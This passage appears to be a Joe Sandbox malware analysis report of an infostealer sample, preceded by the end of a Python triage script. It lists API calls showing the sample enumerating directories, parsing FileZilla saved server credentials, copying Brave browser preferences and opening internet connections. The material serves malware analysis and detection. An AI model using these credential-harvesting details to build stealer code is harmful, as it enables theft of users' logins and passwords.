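    for row in triage(SAMPLE_REPORT):
        print(row)
```

Run it against a saved copy of the report text instead of SAMPLE_REPORT to list every function that enumerates directories and copies or deletes files; the "targets" field then collects the browser and profile names the report resolved, which is the quickest way to see which applications a stealer build goes after. The "first_ref" value is a call-site address, so use it to jump to the right record in the report, not as the function's entry point.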
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006318D2
                          • lstrlen.KERNEL32(\*.*), ref: 006318DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 006318FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0063190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00631947
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 00631967
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00631981
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006319BF
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006319F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631A4C
                          • lstrlen.KERNEL32(00651794), ref: 00631A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631A80
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631AB4
                          • lstrlen.KERNEL32(?), ref: 00631AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 00631AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631B19
                          • lstrlen.KERNEL32(01298A20), ref: 00631B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631B8F
                          • lstrlen.KERNEL32(00651794), ref: 00631BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631BC3
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631C57
                          • lstrlen.KERNEL32(00651794), ref: 00631C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631C8B
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631D21
                          • lstrlen.KERNEL32(00651794), ref: 00631D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631D55
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631DED
                          • lstrlen.KERNEL32(00651794), ref: 00631E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631E36
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631E68
                          • lstrlen.KERNEL32(0129CE48), ref: 00631E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631EB2
                          • lstrlen.KERNEL32(00651794), ref: 00631EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631EE3
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631F15
                          • lstrlen.KERNEL32(0129D2E8), ref: 00631F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631F5F
                          • lstrlen.KERNEL32(00651794), ref: 00631F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631F90
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631FC2
                          • lstrlen.KERNEL32(0128AED8), ref: 00631FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632036
                          • lstrlen.KERNEL32(00651794), ref: 00632048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632067
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00632073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632098
                          • lstrlen.KERNEL32(?), ref: 006320AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006320D0
                          • lstrcat.KERNEL32(00000000,?), ref: 006320DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632103
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063213F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0063214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00632181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: f8abe16055fb32f4bd04f1c1eb951708672da2f59c7387fcb9167034f338f3c8
                          • Instruction ID: b06bfaf027a6f539c8a3845eeb8eff76486979e0d54726871dbf122fc3d4fa40
                          • Opcode Fuzzy Hash: f8abe16055fb32f4bd04f1c1eb951708672da2f59c7387fcb9167034f338f3c8
                          • Instruction Fuzzy Hash: 04628D70911A27ABCB21AF65DC59AEEB7BBBF45701F040128F805AB351DB38DD45CBA0
                          APIs
                          • wsprintfA.USER32 ref: 0063392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00633943
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063396C
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00633986
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006339BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 006339E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006339F2
                          • lstrlen.KERNEL32(00651794), ref: 006339FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633A1A
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633A26
                          • lstrlen.KERNEL32(?), ref: 00633A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633A53
                          • lstrcat.KERNEL32(00000000,?), ref: 00633A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633A8A
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00633ACE
                          • lstrlen.KERNEL32(?), ref: 00633AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633B36
                          • lstrlen.KERNEL32(00651794), ref: 00633B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633B6A
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633B9E
                          • lstrlen.KERNEL32(?), ref: 00633BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 00633BE0
                          • lstrlen.KERNEL32(01298B40), ref: 00633C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633C3C
                          • lstrlen.KERNEL32(01298A20), ref: 00633C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633CB7
                          • lstrlen.KERNEL32(00651794), ref: 00633CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633CE8
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00633D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633D79
                          • lstrlen.KERNEL32(00651794), ref: 00633D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633DAD
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633E43
                          • lstrlen.KERNEL32(00651794), ref: 00633E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633E77
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633F0D
                          • lstrlen.KERNEL32(00651794), ref: 00633F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633F41
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633F75
                          • lstrlen.KERNEL32(?), ref: 00633F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 00633FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633FE0
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063401F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0063402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006340CE
                          • lstrcat.KERNEL32(00000000), ref: 006340DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 006342D9
                          • FindClose.KERNEL32(00000000), ref: 006342E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 81e3e2b654c8069f89391b83fb92c9046d898c2dc3f815939a88fa8ee0c03351
                          • Instruction ID: 7abe198488f3eb7089658c8adc45a9d3320f24630c459d0170aa4eecaff91b94
                          • Opcode Fuzzy Hash: 81e3e2b654c8069f89391b83fb92c9046d898c2dc3f815939a88fa8ee0c03351
                          • Instruction Fuzzy Hash: 03628E71D11A26ABCB21AF65DC49AEEB7BBBF44301F044128F845A7750DB38EE45CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006369C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00636A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00636A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00636AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00636B35
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636B9D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: cf96e222f53a8878dc3a310bf2f6676a50ec69bbc332cac5a70e7bcc236136b2
                          • Instruction ID: 6a81a69b23bdc471b5cb5666726f4414205e3562671b20c7ae5b5fa68ea85e1a
                          • Opcode Fuzzy Hash: cf96e222f53a8878dc3a310bf2f6676a50ec69bbc332cac5a70e7bcc236136b2
                          • Instruction Fuzzy Hash: 8E42A170A01716BBCB61ABB1DC59AAEB7BBBF04701F049518F846E7351DB38D905CBA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DBEF
                          • lstrlen.KERNEL32(00654CA8), ref: 0062DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DC17
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 0062DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DC4C
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DC8F
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0062DCD0
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0062DCF0
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0062DD0A
                          • lstrlen.KERNEL32(0064CFEC), ref: 0062DD1D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DD7B
                          • lstrlen.KERNEL32(00651794), ref: 0062DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DDA3
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DDAF
                          • lstrlen.KERNEL32(?), ref: 0062DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0062DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DE19
                          • lstrlen.KERNEL32(00651794), ref: 0062DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062DE6F
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DE7B
                          • lstrlen.KERNEL32(01298870), ref: 0062DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DEBB
                          • lstrlen.KERNEL32(00651794), ref: 0062DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062DEE6
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DEF2
                          • lstrlen.KERNEL32(01298BA0), ref: 0062DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DFA5
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DFB1
                          • lstrlen.KERNEL32(01298870), ref: 0062DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DFF4
                          • lstrlen.KERNEL32(00651794), ref: 0062DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E022
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062E02E
                          • lstrlen.KERNEL32(01298BA0), ref: 0062E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0062E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0062E0E7
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E11F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0062E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0062E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E19F
                          • lstrcat.KERNEL32(00000000), ref: 0062E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0062E1F9
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E22F
                          • lstrlen.KERNEL32(01298B40), ref: 0062E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E261
                          • lstrcat.KERNEL32(00000000,01298B40), ref: 0062E269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0062E988
                          • FindClose.KERNEL32(00000000), ref: 0062E997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: 97a8fda53679402a2786fa06077219589c4be69a8e9b37e80915abf8c9de7995
                          • Instruction ID: 4b1f6d45517f27945c9b357f41d7dfc8b557bd10caae1ddd34cb35a609e57428
                          • Opcode Fuzzy Hash: 97a8fda53679402a2786fa06077219589c4be69a8e9b37e80915abf8c9de7995
                          • Instruction Fuzzy Hash: DB528F70A11B26ABCB61EF65EC99AEE77BABF04301F044528F84997351DB38DC458F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 006260FF
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00626152
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00626185
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006261B5
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006261F0
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00626223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00626233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 8a9dd344f43c0942b326966167eccfdebf7ef2ff98fd4961f7091b33e48a4cf6
                          • Instruction ID: 6d4c1110b6622d0c8dcddca2873ea9cbea41b3c06d831a31335be2522cba9bc6
                          • Opcode Fuzzy Hash: 8a9dd344f43c0942b326966167eccfdebf7ef2ff98fd4961f7091b33e48a4cf6
                          • Instruction Fuzzy Hash: F9527C71D10A26ABCB61EFA5EC49AEE77BABF04301F154528F805E7251DB38ED018F94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636B9D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636BCD
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636BFD
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00636C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00636C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00636C5A
                          • lstrlen.KERNEL32(00000000), ref: 00636C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00636CE2
                          • lstrlen.KERNEL32(00000000), ref: 00636CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00636D6A
                          • lstrlen.KERNEL32(00000000), ref: 00636D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636DB8
